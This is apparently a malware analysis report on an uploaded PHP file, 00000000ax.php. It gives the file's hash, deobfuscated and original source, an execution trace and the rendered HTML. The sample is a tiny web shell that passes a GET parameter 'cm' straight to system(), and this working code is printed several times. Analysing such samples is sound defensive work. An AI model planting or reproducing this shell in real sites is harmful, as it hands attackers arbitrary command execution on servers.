PHP Malware Analysis

00000000ax.php

md5: dcd3b1c9cb24a9684aa54f21a3a1f0bb

Jump to:

Screenshot


Attributes

Execution

Input

Title


Deobfuscated PHP code

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>

<body>


    <form method="get">
        <input type="text" name="cm">
        <button type="submit">Submit</button>
    </form>


    <pre>
    <?php 
if (isset($_GET['cm'])) {
    system($_GET['cm']);
}
?>

</pre>


</body>

</html>

Execution traces

data/traces/dcd3b1c9cb24a9684aa54f21a3a1f0bb_trace-1676253061.1017.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:51:26.999517]
1	0	1	0.000278	393528
1	3	0	0.000325	393696	{main}	1		/var/www/html/uploads/00000000ax.php	0	0
1	3	1	0.000344	393696
			0.000374	314240
TRACE END   [2023-02-12 23:51:26.999767]


Generated HTML code

<html lang="en"><head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>

<body>


    <form method="get">
        <input type="text" name="cm">
        <button type="submit">Submit</button>
    </form>


    <pre>    <!--?
    if (isset($_GET['cm'])) {
        system($_GET['cm']);
    }
    ?-->

</pre>




</body></html>

Original PHP code

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>

<body>


    <form method="get">
        <input type="text" name="cm">
        <button type="submit">Submit</button>
    </form>


    <pre>
    <?
    if (isset($_GET['cm'])) {
        system($_GET['cm']);
    }
    ?>

</pre>


</body>

</html>